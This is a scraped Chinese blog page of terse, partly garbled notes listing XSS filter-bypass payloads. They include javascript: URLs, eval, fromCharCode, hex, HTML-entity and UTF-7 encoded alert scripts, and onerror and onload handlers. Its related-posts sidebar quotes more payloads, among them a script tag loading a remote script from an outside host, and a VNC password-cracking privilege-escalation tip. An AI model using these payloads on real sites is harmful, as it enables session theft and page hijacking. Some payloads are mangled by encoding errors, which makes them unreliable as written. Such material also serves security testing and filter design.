xss

最新推荐文章于 2022-04-24 22:21:39 发布
最新推荐文章于 2022-04-24 22:21:39 发布
阅读量642 收藏 1
点赞数
分类专栏: vague
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012329314/article/details/71544205
版权




[http://www.baidu.com]


www.google.com\abc

parse \ to / 

www.google.com?abc

transfer to www/?abc


DOM    construct payload  make ' ' pair  // annotate  

interaction  xss worm  

<div style="background:url('javascript:alert("22")')"></div>

<!-- -->

<base>
event  onclick etc

eval function

eval(alert("dd"))



location.hash.substr(1) just from #  

www.g.com/a.php#alert(1)


<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)</script>


<script>alert(“xss”);</script>  to hex  


%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%78%73%73%22%29%3b%3c%2f%73%63%72%69%70%74%3e

<BODY οnlοad="alert('XSS')">


<IMG SRC=""οnerrοr="alert('XSS')">

过滤了双引号和 <script>:
<IMGSRC=javascriptalert(&quot;XSS&quot;)>


使用 CharCode 绕过过滤 :
<IMGSRC=javascriptalert(String.fromCharCode(88,83,83))> <IMGSRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#10
1;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


使用 Ascii 表你可以自己试试。当然转换成 16 进制也是可以的。。

<IMGSRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C
;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>



<LINKREL="stylesheet"HREF="javascript alert('XSS');">   low  verison of ie


<IMGSRC=`javascript alert("Lookits, 'XSS'")`>


使用 UTF-7 编码后 :
+ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
 

Z000000Y
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS
03-13
XSS
【PDF-XSS攻击】Java项目-上传文件-解决PDF文件XSS攻击
最新发布
04-07
PDF-XSS实例文件
XSS 绕过常用语句
Mr.Huang_的博客
09-16 2522
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
XSS过滤绕过
qq_39654116的博客
01-17 4371
目录过滤测试示例输入在script标签中非常规的事件监听HREF内容可控变换JavaScript变换Vbscript变换输入在属性里JSONSVG标签浏览器bug常见标签利用link远程包含js文件javascript伪协议属性payload常用的payload各种alert伪协议Chrome XSS auditor bypass长度限制jquery sourceMappingURL图片名过期的payloadcssmarkdowniframeformmeta绕过过滤空格大小写混淆双写绕过字符拼接编码绕过编码
XSS绕过单引号限制
Vicl1fe的博客
04-20 4238
前言 一个朋友突然问我xss闯关第三关如何反弹cookie。自己研究了一下确实不是太简单。记个笔记在此。 有网上在线的xss闯关。也可以去下载一下 第三关 xss在出现在keyword参数上。用的是单引号闭合的。 看源码可以看到用什么闭合的。但是你f12看的时候是双引号,实际是单引号。所以我觉得这里还是要猜一下。也好猜。不是单引号就是双引号了。 看下图。 1、这个靶场似乎没有cookie。我自己...
XSS绕过总结
qq_42990434的博客
05-29 8048
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
xss过滤总结
weixin_42109829的博客
12-04 3244
一。简述 一。简述 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序. 例如: 1.盗用cookie,获取敏感信息。 2.利用植入Flash,通过crossdomain权限设置进一步获取更高权限;或者利用Java等得到类似的操作。 3.利用iframe、frame、XMLHttpRequest或上述Flash等方式,以...
8、XSS 攻击的防御pdf资料
10-15
XSS(跨站脚本攻击)是网络安全领域中一种常见的攻击方式,主要利用JavaScript来实施恶意行为。这种攻击之所以称为XSS,是因为原本的缩写CSS与层叠样式表(Cascading Style Sheets)冲突,因此改用XSSXSS攻击的...
米斯特 xss
05-03
米斯特的xss进阶教程~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~·~~
springboot整合XSS
03-20
springboot 整合预防xss攻击
45. XSS篇——XSS过滤绕过技巧
Fly_鹏程万里
03-20 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
xss插入代码和绕过过滤
刘正阳的专栏
11-10 2418
代码插入方式   由于插入的脚本为js或者是vbs,所有一般需要由的关键字JavaScript、VbScript、expression比 如XSS');">,但当接收鼠标或键盘响应时,这三个关键字可以省略掉,所以有以下利用方法<img onmouseover="alert('XSS')">或者XSS');">等等。而且由于html并 不遵循xhtml的标准,所以可以有以下插入方式:
XSS绕过技术
suifengshiyu的专栏
03-27 2万+
本文转载自:http://www.2cto.com/Article/201211/168950.html Cross-SiteScripting(XSS)是一类出现在web应用程序上的安全弱点,攻击者可以通过XSS插入一些代码,使得访问页面的其他用户都可以看到,XSS通常是可以被看作漏洞的。它允许攻击者绕过安全机制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,co
渗透测试-xss绕过和htmlspecialchars函数绕过
lza20001103的博客
04-24 4592
xss绕过和htmlspecialchars函数绕过
xss过滤绕过方法总结
jinhezhai的博客
09-15 9793
xss注入常用语句、 1.<script>alert(1)</script> 2.<img src="#" onmouseover="alert(11)"> 3.<img src="#" onerror="alert('xss')"> 4.<svg onload=alert(1)> 5.<a href=javascript:alert(1)> 1.尝试双写绕过 2.大小写绕过、 3.js编码#unicode js的一种编码方式。 4.h
nginx静态资源服务器简单配置
热门推荐
wl的博客
10-28 13万+
nginx静态资源服务器配置
T00LS整理的比较有效的提权方法
weixin_33785108的博客
10-29 380
来源:http://www.t00ls.net/thread-6150-1-1.htmlNo.10 VncVnc不少老外都在用,国内用的比较少,但是几率很大。==============VNC提权方法==============利用shell读取vnc保存在注册表中的密文,使用工具VNC4X破解注册表位置:HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC...
xss-dvwa靶场详情
04-06
"XSS(DVWA靶场详情)" 在网络安全领域,XSS(跨站脚本攻击)是一种常见的漏洞类型,主要针对Web应用程序。DVWA(Damn Vulnerable Web Application)是一个专门为安全专业人员和开发人员设计的靶场,用于学习和测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值